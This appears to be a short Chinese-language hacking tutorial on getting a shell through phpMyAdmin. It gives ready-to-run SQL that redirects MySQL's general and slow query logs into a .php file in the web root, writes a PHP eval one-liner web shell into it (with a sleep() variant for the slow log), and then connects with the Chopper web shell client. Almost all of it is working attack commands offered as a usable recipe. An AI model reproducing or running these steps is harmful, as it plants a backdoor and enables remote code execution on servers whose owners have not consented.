phpMyAdmin提权

条件

1、能成功登录到phpMyAdmin里去
2、有读、写、执行的权限
3、知道网站的绝对路径

操作步骤

1、先爆数据库安装路径

show global variables like "%datadir%";

因为phpstudy时集成环境，所以网站物理路径是C:\phpstudy\WWW

2、利用日志文件或备份文件来写入一句话

日志文件

1、开启日志

set global general_log = "ON";

2、修改日志文件保存的位置

set global general_log_file="网站路径/yjh.php";

3、写入一句话

select '<?php @eval($_POST[233]);?>';

4、查看修改后的信息（随便）

show variables like "%general%";

备份文件

1、开启备份日志

set global slow_query_log="ON";

2、修改备份日志文件保存的位置

set global slow_query_log_file='C:\\phpStudy2016\\WWW\\yjh.php';

3、写入一句话
备份的，我试了，需要用延迟才能成功注入

select 99999999999999999,'<?php @eval($_POST[233]);?>' or sleep(11);

4、查看修改后的信息（随便）

show variables like "%slow_query_log%";

3、菜刀连接